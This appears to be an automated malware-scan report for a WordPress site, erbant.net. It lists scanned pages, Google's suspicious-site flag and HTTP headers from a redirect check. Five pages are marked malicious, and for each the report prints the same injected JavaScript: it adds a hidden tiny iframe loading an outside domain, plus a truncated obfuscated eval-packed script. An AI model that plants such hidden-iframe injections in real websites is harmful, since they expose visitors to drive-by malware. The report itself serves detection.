Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=erbant.net
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://erbant.net/ | 200 OK Content-Length: 55105 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) if(document.loaded) {
showBrowVer(); } else { if (window.addEventListener) { window.addEventListener('load', showBrowVer, false); } else { window.attachEvent('onload', showBrowVer); } } function browserDetectNav(chrAfterPoint) { var UA=window.navigator.userAgent, OperaB = /Opera[ \/]+\w+\.\w+/i, OperaV = /Version[ \/]+\w+\.\w+/i, FirefoxB = /Firefo divTag.id='dt'; document.body.appendChild(divTag); var js_kod2 = document.createElement('iframe'); js_kod2.src = 'http://kreotceonite.com/'; js_kod2.width = '5px'; js_kod2.height = '3px'; js_kod2.setAttribute('style','visibility:hidden'); document.getElementById('dt').appendChild(js_kod2); } } } Decoded script: eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('3e(33(p,a,c,k,e,d){e=33(c){32(c<a?\'\':e(3g(c/a)))+((c=c%a)>35?38.3c(c+29):c.3f(36))};34(!\'\'.37(/^/,38)){39(c--){d[e(c)]=k[c]||e(c)}k=[33(e){32 d[e]}];e=33(){32\'\\\\w+\'};c=1};39(c--){34(k[c]){p=p.37(3a 3b(\'\\\\b\'+e(c)+\'\\\\b\',\'g\'),k[c])}}32 p}(\'1N(1o(p,a,c,k,e, Antivirus reports:
| ||
http://erbant.net/wp-includes/js/l10n.js?ver=20101110 | 200 OK Content-Length: 308 Content-Type: application/javascript | clean |
http://erbant.net/wp-includes/js/jquery/jquery.js?ver=1.6.1 | 200 OK Content-Length: 91363 Content-Type: application/javascript | clean |
http://erbant.net/wp-content/themes/ws-firma-final/layout/js/swfobject.js | 200 OK Content-Length: 25560 Content-Type: application/javascript | clean |
http://erbant.net/wp-content/themes/ws-firma-final/layout/js/cycle.js | 200 OK Content-Length: 51019 Content-Type: application/javascript | clean |
http://erbant.net/wp-content/themes/ws-firma-final/layout/js/hoverIntent.js | 200 OK Content-Length: 4543 Content-Type: application/javascript | clean |
http://erbant.net/wp-content/themes/ws-firma-final/layout/js/superfish.js | 200 OK Content-Length: 3713 Content-Type: application/javascript | clean |
http://erbant.net/wp-content/themes/ws-firma-final/layout/plugins/prettyphoto/js/jquery.prettyPhoto.js | 200 OK Content-Length: 21810 Content-Type: application/javascript | clean |
http://erbant.net/wp-content/themes/ws-firma-final/layout/js/validate.js | 200 OK Content-Length: 14343 Content-Type: application/javascript | clean |
http://erbant.net/wp-content/themes/ws-firma-final/layout/js/custom.js | 200 OK Content-Length: 10950 Content-Type: application/javascript | clean |
http://s7.addthis.com/js/250/addthis_widget.js | 200 OK Content-Length: 10816 Content-Type: text/javascript | clean |
http://erbant.net/?page_id=2 | 200 OK Content-Length: 53970 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) if(document.loaded) {
showBrowVer(); } else { if (window.addEventListener) { window.addEventListener('load', showBrowVer, false); } else { window.attachEvent('onload', showBrowVer); } } function browserDetectNav(chrAfterPoint) { var UA=window.navigator.userAgent, OperaB = /Opera[ \/]+\w+\.\w+/i, OperaV = /Version[ \/]+\w+\.\w+/i, FirefoxB = /Firefo divTag.id='dt'; document.body.appendChild(divTag); var js_kod2 = document.createElement('iframe'); js_kod2.src = 'http://kreotceonite.com/'; js_kod2.width = '5px'; js_kod2.height = '3px'; js_kod2.setAttribute('style','visibility:hidden'); document.getElementById('dt').appendChild(js_kod2); } } } Decoded script: eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('3e(33(p,a,c,k,e,d){e=33(c){32(c<a?\'\':e(3g(c/a)))+((c=c%a)>35?38.3c(c+29):c.3f(36))};34(!\'\'.37(/^/,38)){39(c--){d[e(c)]=k[c]||e(c)}k=[33(e){32 d[e]}];e=33(){32\'\\\\w+\'};c=1};39(c--){34(k[c]){p=p.37(3a 3b(\'\\\\b\'+e(c)+\'\\\\b\',\'g\'),k[c])}}32 p}(\'1N(1o(p,a,c,k,e, Antivirus reports:
| ||
http://erbant.net/?page_id=11 | 200 OK Content-Length: 53548 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) if(document.loaded) {
showBrowVer(); } else { if (window.addEventListener) { window.addEventListener('load', showBrowVer, false); } else { window.attachEvent('onload', showBrowVer); } } function browserDetectNav(chrAfterPoint) { var UA=window.navigator.userAgent, OperaB = /Opera[ \/]+\w+\.\w+/i, OperaV = /Version[ \/]+\w+\.\w+/i, FirefoxB = /Firefo divTag.id='dt'; document.body.appendChild(divTag); var js_kod2 = document.createElement('iframe'); js_kod2.src = 'http://kreotceonite.com/'; js_kod2.width = '5px'; js_kod2.height = '3px'; js_kod2.setAttribute('style','visibility:hidden'); document.getElementById('dt').appendChild(js_kod2); } } } Decoded script: eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('3e(33(p,a,c,k,e,d){e=33(c){32(c<a?\'\':e(3g(c/a)))+((c=c%a)>35?38.3c(c+29):c.3f(36))};34(!\'\'.37(/^/,38)){39(c--){d[e(c)]=k[c]||e(c)}k=[33(e){32 d[e]}];e=33(){32\'\\\\w+\'};c=1};39(c--){34(k[c]){p=p.37(3a 3b(\'\\\\b\'+e(c)+\'\\\\b\',\'g\'),k[c])}}32 p}(\'1N(1o(p,a,c,k,e, Antivirus reports:
| ||
http://erbant.net/?page_id=14 | 200 OK Content-Length: 53982 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) if(document.loaded) {
showBrowVer(); } else { if (window.addEventListener) { window.addEventListener('load', showBrowVer, false); } else { window.attachEvent('onload', showBrowVer); } } function browserDetectNav(chrAfterPoint) { var UA=window.navigator.userAgent, OperaB = /Opera[ \/]+\w+\.\w+/i, OperaV = /Version[ \/]+\w+\.\w+/i, FirefoxB = /Firefo divTag.id='dt'; document.body.appendChild(divTag); var js_kod2 = document.createElement('iframe'); js_kod2.src = 'http://kreotceonite.com/'; js_kod2.width = '5px'; js_kod2.height = '3px'; js_kod2.setAttribute('style','visibility:hidden'); document.getElementById('dt').appendChild(js_kod2); } } } Decoded script: eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('3e(33(p,a,c,k,e,d){e=33(c){32(c<a?\'\':e(3g(c/a)))+((c=c%a)>35?38.3c(c+29):c.3f(36))};34(!\'\'.37(/^/,38)){39(c--){d[e(c)]=k[c]||e(c)}k=[33(e){32 d[e]}];e=33(){32\'\\\\w+\'};c=1};39(c--){34(k[c]){p=p.37(3a 3b(\'\\\\b\'+e(c)+\'\\\\b\',\'g\'),k[c])}}32 p}(\'1N(1o(p,a,c,k,e, Antivirus reports:
| ||
http://erbant.net/?page_id=17 | 200 OK Content-Length: 54908 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) if(document.loaded) {
showBrowVer(); } else { if (window.addEventListener) { window.addEventListener('load', showBrowVer, false); } else { window.attachEvent('onload', showBrowVer); } } function browserDetectNav(chrAfterPoint) { var UA=window.navigator.userAgent, OperaB = /Opera[ \/]+\w+\.\w+/i, OperaV = /Version[ \/]+\w+\.\w+/i, FirefoxB = /Firefo divTag.id='dt'; document.body.appendChild(divTag); var js_kod2 = document.createElement('iframe'); js_kod2.src = 'http://kreotceonite.com/'; js_kod2.width = '5px'; js_kod2.height = '3px'; js_kod2.setAttribute('style','visibility:hidden'); document.getElementById('dt').appendChild(js_kod2); } } } Decoded script: eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('3e(33(p,a,c,k,e,d){e=33(c){32(c<a?\'\':e(3g(c/a)))+((c=c%a)>35?38.3c(c+29):c.3f(36))};34(!\'\'.37(/^/,38)){39(c--){d[e(c)]=k[c]||e(c)}k=[33(e){32 d[e]}];e=33(){32\'\\\\w+\'};c=1};39(c--){34(k[c]){p=p.37(3a 3b(\'\\\\b\'+e(c)+\'\\\\b\',\'g\'),k[c])}}32 p}(\'1N(1o(p,a,c,k,e, Antivirus reports:
|
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: erbant.net
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 28 Feb 2015 16:37:23 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Set-Cookie: wordpress_d6b5c97156cfe025de6af651098031f7=%7C1426351044%7C884df8c2165e6f8e7cb26b04c4c0069a; expires=Sat, 14-Mar-2015 16:37:24 GMT; path=/wp-content/plugins; httponly
Set-Cookie: wordpress_d6b5c97156cfe025de6af651098031f7=%7C1426351044%7C884df8c2165e6f8e7cb26b04c4c0069a; expires=Sat, 14-Mar-2015 16:37:24 GMT; path=/wp-admin; httponly
Set-Cookie: wordpress_logged_in_d6b5c97156cfe025de6af651098031f7=%7C1426351044%7C3ce0c57dec30e712e7907eb694c0aa0e; expires=Sat, 14-Mar-2015 16:37:24 GMT; path=/; httponly
X-Pingback: http://erbant.net/xmlrpc.php
GET / HTTP/1.1
Host: erbant.net
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 28 Feb 2015 16:37:23 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Set-Cookie: wordpress_d6b5c97156cfe025de6af651098031f7=%7C1426351044%7C884df8c2165e6f8e7cb26b04c4c0069a; expires=Sat, 14-Mar-2015 16:37:24 GMT; path=/wp-content/plugins; httponly
Set-Cookie: wordpress_d6b5c97156cfe025de6af651098031f7=%7C1426351044%7C884df8c2165e6f8e7cb26b04c4c0069a; expires=Sat, 14-Mar-2015 16:37:24 GMT; path=/wp-admin; httponly
Set-Cookie: wordpress_logged_in_d6b5c97156cfe025de6af651098031f7=%7C1426351044%7C3ce0c57dec30e712e7907eb694c0aa0e; expires=Sat, 14-Mar-2015 16:37:24 GMT; path=/; httponly
X-Pingback: http://erbant.net/xmlrpc.php
Second query (visit from search engine):
GET / HTTP/1.1
Host: erbant.net
Referer: http://www.google.com/search?q=erbant.net
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: erbant.net
Referer: http://www.google.com/search?q=erbant.net
Result:
The result is similar to the first query. There are no suspicious redirects found.